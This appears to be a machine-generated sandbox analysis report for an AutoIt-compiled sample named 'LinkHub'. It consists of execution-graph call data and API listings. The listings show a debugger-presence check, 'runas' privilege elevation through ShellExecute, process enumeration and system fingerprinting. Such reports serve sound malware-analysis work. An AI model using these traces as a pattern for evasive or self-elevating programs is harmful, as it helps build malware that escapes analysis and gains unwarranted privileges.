102989->102990 103001 ca3778 11 API calls 2 library calls 102989->103001 102996 ca8437 102990->102996 102991->102984 102991->102990 102999 c994fd EnterCriticalSection 102991->102999 103000 c99511 LeaveCriticalSection 102991->103000 102993 ca8528 103002 c994fd EnterCriticalSection 102993->103002 103003 ca3319 LeaveCriticalSection 102996->103003 102998 ca843e 102998->102976 102999->102991 103000->102991 103001->102993 103002->102990 103003->102998 103005 c9014b 22 API calls 103004->103005 103006 c7424e 103005->103006 103006->102932 103008 c76883 103007->103008 103011 cb5780 103007->103011 103014 c9f053 103008->103014 103012->102933 103013->102938 103017 c9ee1a 103014->103017 103016 c76891 103016->102943 103021 c9ee26 CallCatchBlock 103017->103021 103018 c9ee32 103042 c9f649 20 API calls _abort 103018->103042 103020 c9ee58 103030 c994fd EnterCriticalSection 103020->103030 103021->103018 103021->103020 103023 c9ee37 103043 ca2b5c 26 API calls _abort 103023->103043 103024 c9ee64 103031 c9ef7a 103024->103031 103027 c9ee78 103044 c9ee97 LeaveCriticalSection __fread_nolock 103027->103044 103029 c9ee42 __fread_nolock 103029->103016 103030->103024 103032 c9ef9c 103031->103032 103033 c9ef8c 103031->103033 103035 c9eea1 28 API calls 103032->103035 103034 c9f649 __dosmaperr 20 API calls 103033->103034 103036 c9ef91 103034->103036 103038 c9efbf 103035->103038 103036->103027 103037 c9f03e 103037->103027 103038->103037 103039 c9df7b 62 API calls 103038->103039 103040 c9efe6 103039->103040 103041 ca97a4 __wsopen_s 28 API calls 103040->103041 103041->103037 103042->103023 103043->103029 103044->103029 103048 c9ec51 103045->103048 103047 c7686d 103047->102949 103049 c9ec5d CallCatchBlock 103048->103049 103050 c9ec9d 103049->103050 103051 c9ec70 ___scrt_fastfail 103049->103051 103052 c9ec95 __fread_nolock 103049->103052 103061 c994fd EnterCriticalSection 103050->103061 103075 c9f649 20 API calls _abort 103051->103075 103052->103047 103054 c9eca7 103062 c9ea68 103054->103062 103056 
c9ec8a 103076 ca2b5c 26 API calls _abort 103056->103076 103061->103054 103066 c9ea7a ___scrt_fastfail 103062->103066 103068 c9ea97 103062->103068 103063 c9ea87 103150 c9f649 20 API calls _abort 103063->103150 103065 c9ea8c 103151 ca2b5c 26 API calls _abort 103065->103151 103066->103063 103066->103068 103070 c9eada __fread_nolock 103066->103070 103077 c9ecdc LeaveCriticalSection __fread_nolock 103068->103077 103069 c9ebf6 ___scrt_fastfail 103153 c9f649 20 API calls _abort 103069->103153 103070->103068 103070->103069 103078 c9dcc5 103070->103078 103085 ca90c5 103070->103085 103152 c9d2e8 26 API calls 4 library calls 103070->103152 103075->103056 103076->103052 103077->103052 103079 c9dcd1 103078->103079 103080 c9dce6 103078->103080 103081 c9f649 __dosmaperr 20 API calls 103079->103081 103080->103070 103082 c9dcd6 103081->103082 103083 ca2b5c _abort 26 API calls 103082->103083 103084 c9dce1 103083->103084 103084->103070 103086 ca90ef 103085->103086 103087 ca90d7 103085->103087 103088 ca9459 103086->103088 103094 ca9134 103086->103094 103089 c9f636 __dosmaperr 20 API calls 103087->103089 103091 c9f636 __dosmaperr 20 API calls 103088->103091 103090 ca90dc 103089->103090 103092 c9f649 __dosmaperr 20 API calls 103090->103092 103093 ca945e 103091->103093 103095 ca90e4 103092->103095 103096 c9f649 __dosmaperr 20 API calls 103093->103096 103094->103095 103097 ca913f 103094->103097 103103 ca916f 103094->103103 103095->103070 103098 ca914c 103096->103098 103099 c9f636 __dosmaperr 20 API calls 103097->103099 103101 ca2b5c _abort 26 API calls 103098->103101 103100 ca9144 103099->103100 103102 c9f649 __dosmaperr 20 API calls 103100->103102 103101->103095 103102->103098 103104 ca9188 103103->103104 103105 ca91ca 103103->103105 103106 ca91ae 103103->103106 103104->103106 103139 ca9195 103104->103139 103109 ca3b93 __fread_nolock 21 API calls 103105->103109 103107 c9f636 __dosmaperr 20 API calls 103106->103107 103108 ca91b3 103107->103108 103110 c9f649 __dosmaperr 20 API calls 
103108->103110 103112 ca91e1 103109->103112 103114 ca91ba 103110->103114 103111 cafc1b __fread_nolock 26 API calls 103115 ca9333 103111->103115 103113 ca2d38 _free 20 API calls 103112->103113 103116 ca91ea 103113->103116 103117 ca2b5c _abort 26 API calls 103114->103117 103118 ca93a9 103115->103118 103121 ca934c GetConsoleMode 103115->103121 103119 ca2d38 _free 20 API calls 103116->103119 103148 ca91c5 __fread_nolock 103117->103148 103120 ca93ad ReadFile 103118->103120 103122 ca91f1 103119->103122 103123 ca9421 GetLastError 103120->103123 103124 ca93c7 103120->103124 103121->103118 103125 ca935d 103121->103125 103126 ca91fb 103122->103126 103127 ca9216 103122->103127 103128 ca942e 103123->103128 103129 ca9385 103123->103129 103124->103123 103130 ca939e 103124->103130 103125->103120 103131 ca9363 ReadConsoleW 103125->103131 103133 c9f649 __dosmaperr 20 API calls 103126->103133 103135 ca97a4 __wsopen_s 28 API calls 103127->103135 103134 c9f649 __dosmaperr 20 API calls 103128->103134 103140 c9f613 __dosmaperr 20 API calls 103129->103140 103129->103148 103143 ca93ec 103130->103143 103144 ca9403 103130->103144 103130->103148 103131->103130 103136 ca937f GetLastError 103131->103136 103132 ca2d38 _free 20 API calls 103132->103095 103137 ca9200 103133->103137 103138 ca9433 103134->103138 103135->103139 103136->103129 103141 c9f636 __dosmaperr 20 API calls 103137->103141 103142 c9f636 __dosmaperr 20 API calls 103138->103142 103139->103111 103140->103148 103141->103148 103142->103148 103146 ca8de1 __fread_nolock 31 API calls 103143->103146 103145 ca941a 103144->103145 103144->103148 103147 ca8c21 __fread_nolock 29 API calls 103145->103147 103146->103148 103149 ca941f 103147->103149 103148->103132 103149->103148 103150->103065 103151->103068 103152->103070 103153->103065 103157 c9e858 103154->103157 103156 ce311c 103156->102951 103160 c9e7d9 103157->103160 103159 c9e875 103159->103156 103161 c9e7e8 103160->103161 103162 c9e7fc 103160->103162 103168 c9f649 20 API calls _abort 
103161->103168 103167 c9e7f8 __alldvrm 103162->103167 103170 ca36b2 11 API calls 2 library calls 103162->103170 103164 c9e7ed 103169 ca2b5c 26 API calls _abort 103164->103169 103167->103159 103168->103164 103169->103167 103170->103167 103172 cb22d0 __wsopen_s 103171->103172 103173 c73af6 GetCurrentDirectoryW 103172->103173 103174 c78577 22 API calls 103173->103174 103175 c73b19 103174->103175 103175->102777 103215 c7b120 103176->103215 103179 c76d47 103184 c76d5e 103179->103184 103180 cb592a SetFilePointerEx 103181 c76de5 SetFilePointerEx SetFilePointerEx 103183 c73c5e 103181->103183 103182 cb5919 103182->103180 103183->102794 103183->102795 103184->103180 103184->103181 103184->103182 103184->103183 103186 c77ab5 103185->103186 103187 c77ac4 103185->103187 103186->102822 103187->103186 103188 c77ac9 CloseHandle 103187->103188 103188->103186 103189->102780 103190->102791 103191->102764 103192->102806 103193->102811 103201->102764 103202->102774 103211->102856 103214->102786 103216 c7b12e 103215->103216 103217 c7b19b 103215->103217 103219 c73b2d 103216->103219 103220 c7b16c ReadFile 103216->103220 103222 c8f18b SetFilePointerEx 103217->103222 103219->103179 103220->103219 103221 c7b186 103220->103221 103221->103216 103221->103219 103222->103216 103224 ce383b 103223->103224 103225 c7684a 40 API calls 103224->103225 103226 ce36fc 103224->103226 103227 ce32bd 27 API calls 103224->103227 103228 c76874 64 API calls 103224->103228 103225->103224 103226->102863 103226->102882 103227->103224 103228->103224 103230 ce2c98 103229->103230 103231 ce2ca6 103229->103231 103232 c9e95b 29 API calls 103230->103232 103233 ce2ceb 103231->103233 103234 c9e95b 29 API calls 103231->103234 103257 ce2caf 103231->103257 103232->103231 103258 ce2f16 40 API calls __fread_nolock 103233->103258 103236 ce2cd0 103234->103236 103236->103233 103239 ce2cd9 103236->103239 103237 ce2d2f 103238 ce2d54 103237->103238 103240 ce2d33 103237->103240 103259 ce2b30 103238->103259 103239->103257 103266 c9e9e8 
103239->103266 103241 ce2d40 103240->103241 103245 c9e9e8 67 API calls 103240->103245 103248 c9e9e8 67 API calls 103241->103248 103241->103257 103245->103241 103248->103257 103257->102882 103258->103237 103260 c9ed7c ___std_exception_copy 21 API calls 103259->103260 103261 ce2b3e 103260->103261 103262 c9ed7c ___std_exception_copy 21 API calls 103261->103262 103263 ce2b4f 103262->103263 103264 c9ed7c ___std_exception_copy 21 API calls 103263->103264 103265 ce2b5b 103264->103265 103267 c9e9f4 CallCatchBlock 103266->103267 103268 c9ea1a 103267->103268 103269 c9ea05 103267->103269 103278 c9ea15 __fread_nolock 103268->103278 103280 c994fd EnterCriticalSection 103268->103280 103297 c9f649 20 API calls _abort 103269->103297 103271 c9ea0a 103298 ca2b5c 26 API calls _abort 103271->103298 103274 c9ea36 103281 c9e972 103274->103281 103278->103257 103280->103274 103282 c9e97f 103281->103282 103283 c9e994 103281->103283 103325 c9f649 20 API calls _abort 103282->103325 103289 c9e98f 103283->103289 103300 c9df7b 103283->103300 103297->103271 103298->103278 103352->102479 103354 c739eb 103353->103354 103355 c75f4e 103353->103355 103354->102485 103387 cdd11f 42 API calls 103354->103387 103355->103354 103356 cb5070 DestroyIcon 103355->103356 103356->103354 103358 c761c6 103357->103358 103359 c762a8 103357->103359 103388 c77ad5 103358->103388 103359->102490 103362 cb5278 LoadStringW 103366 cb5292 103362->103366 103363 c761e1 103364 c78577 22 API calls 103363->103364 103365 c761f6 103364->103365 103367 c76203 103365->103367 103374 cb52ae 103365->103374 103369 c7bed9 22 API calls 103366->103369 103373 c76229 ___scrt_fastfail 103366->103373 103367->103366 103368 c7620d 103367->103368 103370 c76b7c 22 API calls 103368->103370 103369->103373 103371 c7621b 103370->103371 103393 c77bb5 22 API calls 103371->103393 103375 c7628e Shell_NotifyIconW 103373->103375 103374->103373 103376 c7bf73 22 API calls 103374->103376 103377 cb52f1 103374->103377 103375->103359 103378 cb52d8 103376->103378 
103396 c8fe6f 51 API calls 103377->103396 103394 cda350 23 API calls 103378->103394 103381 cb5310 103383 c76b7c 22 API calls 103381->103383 103382 cb52e3 103395 c77bb5 22 API calls 103382->103395 103385 cb5321 103383->103385 103386 c76b7c 22 API calls 103385->103386 103386->103373 103387->102485 103389 c9017b 22 API calls 103388->103389 103390 c77afa 103389->103390 103391 c9014b 22 API calls 103390->103391 103392 c761d4 103391->103392 103392->103362 103392->103363 103393->103373 103394->103382 103395->103377 103396->103381 103398 c76bb4 _wcslen 103397->103398 103399 c76bc7 103398->103399 103400 cb5860 103398->103400 103407 c77d74 103399->103407 103402 c9014b 22 API calls 103400->103402 103404 cb586a 103402->103404 103403 c76bd4 __fread_nolock 103403->102515 103405 c9017b 22 API calls 103404->103405 103406 cb589a __fread_nolock 103405->103406 103409 c77d8a 103407->103409 103411 c77d85 __fread_nolock 103407->103411 103408 cb6528 103409->103408 103410 c9017b 22 API calls 103409->103410 103410->103411 103411->103403 103413 c94f4b _abort 103412->103413 103414 c94f52 103413->103414 103415 c94f64 103413->103415 103451 c95099 GetModuleHandleW 103414->103451 103436 ca32d1 EnterCriticalSection 103415->103436 103418 c94f57 103418->103415 103452 c950dd GetModuleHandleExW 103418->103452 103419 c95009 103440 c95049 103419->103440 103423 c94f6b 103423->103419 103425 c94fe0 103423->103425 103437 ca2518 103423->103437 103426 c94ff8 103425->103426 103430 ca2791 _abort 5 API calls 103425->103430 103431 ca2791 _abort 5 API calls 103426->103431 103427 c95052 103460 cb20a9 5 API calls _ValidateLocalCookies 103427->103460 103428 c95026 103443 c95058 103428->103443 103430->103426 103431->103419 103436->103423 103461 ca2251 103437->103461 103480 ca3319 LeaveCriticalSection 103440->103480 103442 c95022 103442->103427 103442->103428 103481 ca397f 103443->103481 103446 c95086 103449 c950dd _abort 8 API calls 103446->103449 103447 c95066 GetPEB 103447->103446 103448 c95076 GetCurrentProcess 
Execution Graph (excerpt): only the node and edge data of the rendered function-call graph survived extraction. Each node is a function address in the unpacked Remcos payload, annotated with the Windows APIs it calls and the number of API calls reached through it; edges give the caller-to-callee relationships.

APIs named in this portion of the graph: TerminateProcess, ExitProcess, GetProcAddress, FreeLibrary, GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObject, WaitForSingleObjectEx, InterlockedExchange, GetCurrentProcess, DuplicateHandle, CreateThread, TerminateThread, ReadFile, CreateFileW, GetFileType, SetFilePointerEx, GetLastError, CloseHandle, FindClose, RegisterWindowMessageW, PeekMessageW, TranslateMessage, DispatchMessageW, IsDialogMessageW, GetClassLongW, TranslateAcceleratorW, GetInputState, timeGetTime, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, GetExitCodeProcess, GetForegroundWindow, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, Shell_NotifyIconW, GetEnvironmentVariableW, CharUpperBuffW, CharLowerBuffW, GetStringTypeW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, mciSendStringW, UnregisterHotKey, VirtualFree, CoUninitialize, DestroyWindow, DeleteObject, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus.
104647->104648 104649 c81e50 41 API calls ISource 104647->104649 104648->104647 104649->104647 104650->104620 104651->104627 104652->104642 104653->104627 104654->104627 104655->104627 104656 c815ff 104663 c8e3d5 104656->104663 104658 c81615 104672 c8e439 104658->104672 104660 c8163f 104684 ce3fe1 82 API calls __wsopen_s 104660->104684 104662 cc6207 104664 c8e3e3 104663->104664 104665 c8e3f6 104663->104665 104685 c7b4c8 22 API calls 104664->104685 104667 c8e429 104665->104667 104668 c8e3fb 104665->104668 104686 c7b4c8 22 API calls 104667->104686 104670 c9014b 22 API calls 104668->104670 104671 c8e3ed 104670->104671 104671->104658 104673 c77ad5 22 API calls 104672->104673 104674 c8e470 104673->104674 104675 c7b329 22 API calls 104674->104675 104677 c8e4a1 104674->104677 104676 cce53e 104675->104676 104687 c77bb5 22 API calls 104676->104687 104677->104660 104679 cce549 104688 c8e7c1 40 API calls 104679->104688 104681 cce55c 104683 cce560 104681->104683 104689 c7b4c8 22 API calls 104681->104689 104683->104683 104684->104662 104685->104671 104686->104671 104687->104679 104688->104681 104689->104683 104690 c7dd3d 104691 c7dd63 104690->104691 104692 cc19c2 104690->104692 104694 c9014b 22 API calls 104691->104694 104713 c7dead 104691->104713 104693 cc1a46 104692->104693 104696 cc1a82 104692->104696 104701 cc1a26 104692->104701 104698 cc1a7d 104693->104698 104736 ce3fe1 82 API calls __wsopen_s 104693->104736 104700 c7dd8d 104694->104700 104737 ce3fe1 82 API calls __wsopen_s 104696->104737 104697 c9017b 22 API calls 104708 c7dee4 __fread_nolock 104697->104708 104703 c9014b 22 API calls 104700->104703 104700->104708 104735 c8e6e8 191 API calls 104701->104735 104704 c7dddb 104703->104704 104704->104701 104706 c7de16 104704->104706 104705 c9017b 22 API calls 104705->104708 104707 c80340 191 API calls 104706->104707 104709 c7de29 104707->104709 104708->104693 104708->104705 104709->104698 104709->104708 104710 cc1aa5 104709->104710 104711 c7de77 104709->104711 104714 c7d526 
104709->104714 104738 ce3fe1 82 API calls __wsopen_s 104710->104738 104711->104713 104711->104714 104713->104697 104715 c9014b 22 API calls 104714->104715 104716 c7d589 104715->104716 104717 c7c32d 22 API calls 104716->104717 104718 c7d5b3 104717->104718 104719 c9014b 22 API calls 104718->104719 104725 c7d66e ISource 104719->104725 104721 c7bed9 22 API calls 104721->104725 104724 cc1f79 104740 cd56ae 22 API calls ISource 104724->104740 104725->104721 104725->104724 104726 cc1f94 104725->104726 104729 c7d911 ISource 104725->104729 104732 c7c3ab 22 API calls ISource 104725->104732 104739 c7b4c8 22 API calls 104725->104739 104730 c7d9ac ISource 104729->104730 104733 c7c3ab 22 API calls ISource 104729->104733 104731 c7d9c3 104730->104731 104734 c8e30a 22 API calls ISource 104730->104734 104732->104725 104733->104730 104734->104730 104735->104693 104736->104698 104737->104698 104738->104698 104739->104725 104740->104726 104741 c7f4dc 104744 c7cab0 104741->104744 104745 c7cacb 104744->104745 104746 cc150c 104745->104746 104747 cc14be 104745->104747 104774 c7caf0 104745->104774 104784 cf62ff 191 API calls 2 library calls 104746->104784 104750 cc14c8 104747->104750 104753 cc14d5 104747->104753 104747->104774 104782 cf6790 191 API calls 104750->104782 104752 c8bc58 22 API calls 104752->104774 104765 c7cdc0 104753->104765 104783 cf6c2d 191 API calls 2 library calls 104753->104783 104757 cc179f 104757->104757 104759 c7cdee 104761 cc16e8 104787 cf6669 82 API calls 104761->104787 104764 c7be2d 40 API calls 104764->104774 104765->104759 104788 ce3fe1 82 API calls __wsopen_s 104765->104788 104769 c7cf80 40 API calls 104769->104774 104770 c8e807 40 API calls 104770->104774 104771 c80340 191 API calls 104771->104774 104772 c7bed9 22 API calls 104772->104774 104774->104752 104774->104759 104774->104761 104774->104764 104774->104765 104774->104769 104774->104770 104774->104771 104774->104772 104775 c8e7c1 40 API calls 104774->104775 104776 c8aa99 191 API calls 104774->104776 104777 
c905b2 5 API calls __Init_thread_wait 104774->104777 104778 c90413 29 API calls __onexit 104774->104778 104779 c90568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104774->104779 104780 c8f4df 82 API calls 104774->104780 104781 c8f346 191 API calls 104774->104781 104785 c7b4c8 22 API calls 104774->104785 104786 ccffaf 22 API calls 104774->104786 104775->104774 104776->104774 104777->104774 104778->104774 104779->104774 104780->104774 104781->104774 104782->104753 104783->104765 104784->104774 104785->104774 104786->104774 104787->104765 104788->104757 104789 cce737 104790 cce6e4 104789->104790 104793 cde83e SHGetFolderPathW 104790->104793 104792 cce6ed 104792->104792 104794 c78577 22 API calls 104793->104794 104795 cde86b 104794->104795 104795->104792 104796 c7105b 104801 c752a7 104796->104801 104798 c7106a 104832 c90413 29 API calls __onexit 104798->104832 104800 c71074 104802 c752b7 __wsopen_s 104801->104802 104803 c7bf73 22 API calls 104802->104803 104804 c7536d 104803->104804 104805 c75594 24 API calls 104804->104805 104806 c75376 104805->104806 104833 c75238 104806->104833 104809 c76b7c 22 API calls 104810 c7538f 104809->104810 104811 c76a7c 22 API calls 104810->104811 104812 c7539e 104811->104812 104813 c7bf73 22 API calls 104812->104813 104814 c753a7 104813->104814 104815 c7bd57 22 API calls 104814->104815 104816 c753b0 RegOpenKeyExW 104815->104816 104817 cb4be6 RegQueryValueExW 104816->104817 104821 c753d2 104816->104821 104818 cb4c7c RegCloseKey 104817->104818 104819 cb4c03 104817->104819 104818->104821 104831 cb4c8e _wcslen 104818->104831 104820 c9017b 22 API calls 104819->104820 104822 cb4c1c 104820->104822 104821->104798 104824 c7423c 22 API calls 104822->104824 104823 c7655e 22 API calls 104823->104831 104825 cb4c27 RegQueryValueExW 104824->104825 104826 cb4c44 104825->104826 104828 cb4c5e ISource 104825->104828 104827 c78577 22 API calls 104826->104827 104827->104828 104828->104818 104829 c7b329 22 API calls 104829->104831 104830 
c76a7c 22 API calls 104830->104831 104831->104821 104831->104823 104831->104829 104831->104830 104832->104800 104834 cb22d0 __wsopen_s 104833->104834 104835 c75245 GetFullPathNameW 104834->104835 104836 c75267 104835->104836 104837 c78577 22 API calls 104836->104837 104838 c75285 104837->104838 104838->104809 104839 cc5650 104840 c8e3d5 22 API calls 104839->104840 104841 cc5666 104840->104841 104845 cc56e1 104841->104845 104848 c8aa65 23 API calls 104841->104848 104843 cc56c1 104843->104845 104849 ce247e 22 API calls 104843->104849 104847 cc61d7 104845->104847 104850 ce3fe1 82 API calls __wsopen_s 104845->104850 104848->104843 104849->104845 104850->104847 104851 c71098 104856 c75fc8 104851->104856 104855 c710a7 104857 c7bf73 22 API calls 104856->104857 104858 c75fdf GetVersionExW 104857->104858 104859 c78577 22 API calls 104858->104859 104860 c7602c 104859->104860 104861 c7adf4 22 API calls 104860->104861 104871 c76062 104860->104871 104862 c76056 104861->104862 104863 c755dc 22 API calls 104862->104863 104863->104871 104864 c7611c GetCurrentProcess IsWow64Process 104865 c76138 104864->104865 104866 cb5269 GetSystemInfo 104865->104866 104867 c76150 LoadLibraryA 104865->104867 104868 c76161 GetProcAddress 104867->104868 104869 c7619d GetSystemInfo 104867->104869 104868->104869 104873 c76171 GetNativeSystemInfo 104868->104873 104870 c76177 104869->104870 104874 c7109d 104870->104874 104875 c7617b FreeLibrary 104870->104875 104871->104864 104872 cb5224 104871->104872 104873->104870 104876 c90413 29 API calls __onexit 104874->104876 104875->104874 104876->104855

                                                                    Control-flow Graph
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 00C75FF7
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • GetCurrentProcess.KERNEL32(?,00D0DC2C,00000000,?,?), ref: 00C76123
                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C7612A
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C76155
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C76167
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C76175
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C7617C
                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00C761A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                    • API String ID: 3290436268-3101561225
                                                                    • Opcode ID: d1b47fe34378e1c4aa185f88973b1a4a46cfd6813647cb7f699442fd914d91e7
                                                                    • Instruction ID: 61644d07eda1a7613d8e7a465521346ec8f061f6316a92371e7772296b5e79ef
                                                                    • Opcode Fuzzy Hash: d1b47fe34378e1c4aa185f88973b1a4a46cfd6813647cb7f699442fd914d91e7
                                                                    • Instruction Fuzzy Hash: C7A16C2A81A7C08FC715DFAA7C4D2B97E756B27340F88889DF485D7322C6694948CF36

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C73368,?), ref: 00C733BB
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C73368,?), ref: 00C733CE
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D42418,00D42400,?,?,?,?,?,?,00C73368,?), ref: 00C7343A
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                      • Part of subcall function 00C7425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C73462,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C742A0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C734BB
                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00CB3CB0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00CB3CF1
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D331F4,00D42418,?,?,?,?,?,?,?,00C73368), ref: 00CB3D7A
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CB3D81
                                                                      • Part of subcall function 00C734D3: GetSysColorBrush.USER32(0000000F), ref: 00C734DE
                                                                      • Part of subcall function 00C734D3: LoadCursorW.USER32(00000000,00007F00), ref: 00C734ED
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(00000063), ref: 00C73503
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(000000A4), ref: 00C73515
                                                                      • Part of subcall function 00C734D3: LoadIconW.USER32(000000A2), ref: 00C73527
                                                                      • Part of subcall function 00C734D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C7353F
                                                                      • Part of subcall function 00C734D3: RegisterClassExW.USER32(?), ref: 00C73590
                                                                      • Part of subcall function 00C735B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C735E1
                                                                      • Part of subcall function 00C735B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73602
                                                                      • Part of subcall function 00C735B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C73616
                                                                      • Part of subcall function 00C735B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C7361F
                                                                      • Part of subcall function 00C7396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C73A3C
                                                                    Strings
                                                                    • AutoIt, xrefs: 00CB3CA5
                                                                    • runas, xrefs: 00CB3D75
                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00CB3CAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                    • API String ID: 683915450-2030392706
                                                                    • Opcode ID: adc346158d3cbd86b2f157205be35a5e13f2e293391c364596614a219b522b49
                                                                    • Instruction ID: 41cf158f52a1d399a15a93fde91fcc26d8c572d1e9c48a364fe962b0686722cd
                                                                    • Opcode Fuzzy Hash: adc346158d3cbd86b2f157205be35a5e13f2e293391c364596614a219b522b49
                                                                    • Instruction Fuzzy Hash: 9451E7711083806FC705EFB4DC05D7A7FA99B95750F40851DF59D922A2DB248A49AB32

                                                                    Control-flow Graph
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CDDDAC
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CDDDBA
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00CDDDDA
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00CDDE87
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: 6f18e18d7a1e991a9f7e714f2440fd6d976efbdf733f807181093cd9ff8f212f
                                                                    • Instruction ID: 3f85521a3d0de07a9e84fa275060ba31d37e201a9846d1109fac6df301cf76b8
                                                                    • Opcode Fuzzy Hash: 6f18e18d7a1e991a9f7e714f2440fd6d976efbdf733f807181093cd9ff8f212f
                                                                    • Instruction Fuzzy Hash: EC3193711083009FD310EF60C885BAFBBE8EF99350F44492EF586872A1DB719E45DB92
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000003,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000,?,00CA2C59,00000003), ref: 00C95079
                                                                    • TerminateProcess.KERNEL32(00000000,?,00C9502E,00000003,00D398D8,0000000C,00C95185,00000003,00000002,00000000,?,00CA2C59,00000003), ref: 00C95080
                                                                    • ExitProcess.KERNEL32 ref: 00C95092
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
